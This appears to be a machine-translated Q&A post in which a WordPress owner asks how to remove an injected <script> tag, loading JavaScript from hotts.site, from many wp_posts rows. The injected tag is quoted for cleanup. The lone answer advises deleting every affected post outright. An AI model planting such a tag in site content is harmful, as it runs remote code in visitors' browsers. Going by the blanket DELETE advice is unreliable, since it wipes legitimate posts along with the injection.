我有一个问题,我的Wordpress数据库已被利用!在wp_post表中,我有很多这样的条目
<script src='https://hotts.site/site.js?zzz=3' type='text/javascript'></script>
我没有使用完整的URL,所以没有人访问它,但是它基本上是相同的。我正在尝试从数据库中删除这些。到目前为止,我已经尝试过
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://hotts.site/site.js' type='text/javascript'></script>", '') WHERE post_content LIKE '%<script src=\'https://hotts.site/site.js%></script>%';
和
UPDATE wp_posts SET post_content = REPLACE(post_content,'<script src='https://hotts.site/site.js' type='text/javascript'></script>','');
但是它们都回来了,没有更新的行。
我如何删除所有出现的标签?
谢谢
答案 0 :(得分:0)
您真的应该删除帖子:
DELETE FROM wp_posts WHERE post_content LIKE "%hotts.site%"